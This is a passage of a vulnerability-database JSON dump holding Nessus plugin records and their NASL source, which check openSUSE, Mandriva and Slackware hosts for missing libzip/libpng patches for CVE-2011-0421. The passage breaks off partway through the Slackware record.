"2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libzip-util", "p-cpe:/a:novell:opensuse:libzip-util-debuginfo", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:libzip-devel", "p-cpe:/a:novell:opensuse:libzip1", "p-cpe:/a:novell:opensuse:libzip1-debugsource", "p-cpe:/a:novell:opensuse:libzip1-debuginfo"], "id": "SUSE_11_4_LIBZIP-DEVEL-110321.NASL", "href": "https://www.tenable.com/plugins/nessus/75940", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libzip-devel-4188.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75940);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0421\");\n\n script_name(english:\"openSUSE Security Update : libzip-devel (openSUSE-SU-2011:0449-1)\");\n script_summary(english:\"Check for the libzip-devel-4188 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"empty zip archives could crash programs using libzip (CVE-2011-0421).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=681193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-05/msg00011.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libzip-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip-util-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libzip-devel-0.9-30.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libzip-util-0.9-30.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libzip-util-debuginfo-0.9-30.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libzip1-0.9-30.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libzip1-debuginfo-0.9-30.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libzip1-debugsource-0.9-30.31.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libzip-devel / libzip-util / libzip1 / libzip-util-debuginfo / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:06:12", "description": "empty zip archives could crash programs using libzip (CVE-2011-0421).", "edition": 23, "published": "2011-05-09T00:00:00", "title": "openSUSE Security Update : libzip-devel (openSUSE-SU-2011:0449-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421"], "modified": "2011-05-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libzip-util", "p-cpe:/a:novell:opensuse:libzip-devel", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:libzip1"], "id": "SUSE_11_2_LIBZIP-DEVEL-110321.NASL", "href": "https://www.tenable.com/plugins/nessus/53838", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libzip-devel-4188.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53838);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0421\");\n\n script_name(english:\"openSUSE Security Update : libzip-devel (openSUSE-SU-2011:0449-1)\");\n script_summary(english:\"Check for the libzip-devel-4188 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"empty zip archives could crash programs using libzip (CVE-2011-0421).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=681193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-05/msg00011.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libzip-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libzip-devel-0.9-23.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libzip-util-0.9-23.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libzip1-0.9-23.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libzip-devel / libzip-util / libzip1\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T11:53:18", "description": "A vulnerability has been identified and fixed in libzip :\n\nThe _zip_name_locate function in zip_name_locate.c in the Zip\nextension in PHP before 5.3.6 does not properly handle a\nZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent\nattackers to cause a denial of service (application crash) via an\nempty ZIP archive that is processed with a (1) locateName or (2)\nstatName operation (CVE-2011-0421).\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.", "edition": 25, "published": "2011-05-25T00:00:00", "title": "Mandriva Linux Security Advisory : libzip (MDVSA-2011:099)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421"], "modified": "2011-05-25T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libzip1", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:lib64zip1", "p-cpe:/a:mandriva:linux:libzip-devel", "p-cpe:/a:mandriva:linux:libzip1-devel", "p-cpe:/a:mandriva:linux:libzip", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:lib64zip1-devel", "p-cpe:/a:mandriva:linux:lib64zip-devel"], "id": "MANDRIVA_MDVSA-2011-099.NASL", "href": "https://www.tenable.com/plugins/nessus/54638", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:099. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54638);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0421\");\n script_bugtraq_id(46354);\n script_xref(name:\"MDVSA\", value:\"2011:099\");\n\n script_name(english:\"Mandriva Linux Security Advisory : libzip (MDVSA-2011:099)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been identified and fixed in libzip :\n\nThe _zip_name_locate function in zip_name_locate.c in the Zip\nextension in PHP before 5.3.6 does not properly handle a\nZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent\nattackers to cause a denial of service (application crash) via an\nempty ZIP archive that is processed with a (1) locateName or (2)\nstatName operation (CVE-2011-0421).\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64zip-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64zip1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64zip1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libzip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libzip-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libzip1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libzip1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64zip1-0.9-1.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64zip1-devel-0.9-1.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"libzip-0.9-1.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libzip1-0.9-1.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libzip1-devel-0.9-1.1mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64zip-devel-0.9.3-2.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64zip1-0.9.3-2.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"libzip-0.9.3-2.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libzip-devel-0.9.3-2.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libzip1-0.9.3-2.1mdv2010.2\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:07:48", "description": "empty zip archives could crash programs using libzip (CVE-2011-0421).", "edition": 23, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : libzip-devel (openSUSE-SU-2011:0449-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libzip-util", "p-cpe:/a:novell:opensuse:libzip-devel", "p-cpe:/a:novell:opensuse:libzip1", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_LIBZIP-DEVEL-110321.NASL", "href": "https://www.tenable.com/plugins/nessus/75637", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libzip-devel-4188.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75637);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0421\");\n\n script_name(english:\"openSUSE Security Update : libzip-devel (openSUSE-SU-2011:0449-1)\");\n script_summary(english:\"Check for the libzip-devel-4188 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"empty zip archives could crash programs using libzip (CVE-2011-0421).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=681193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-05/msg00011.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libzip-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libzip1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libzip-devel-0.9-27.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libzip-util-0.9-27.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libzip1-0.9-27.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libzip-devel / libzip-util / libzip1\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T09:10:36", "description": "New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current to\nfix security issues.", "edition": 24, "published": "2011-08-01T00:00:00", "title": "Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / 8.1 / 9.0 / 9.1 / current : libpng (SSA:2011-210-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421", "CVE-2011-2501"], "modified": "2011-08-01T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:13.37", "p-cpe:/a:slackware:slackware_linux:libpng", "cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:10.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.2", "cpe:/o:slackware:slackware_linux:12.1", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2011-210-01.NASL", "href": "https://www.tenable.com/plugins/nessus/55735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2011-210-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55735);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0421\", \"CVE-2011-2501\");\n script_bugtraq_id(48474);\n script_xref(name:\"SSA\", value:\"2011-210-01\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / 8.1 / 9.0 / 9.1 / current : libpng (SSA:2011-210-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current to\nfix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2011&m=slackware-security.617466\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a1733c9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpng package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"11.0\", pkgname:\"libpng\", pkgver:\"1.2.46\", pkgarch:\"i486\", 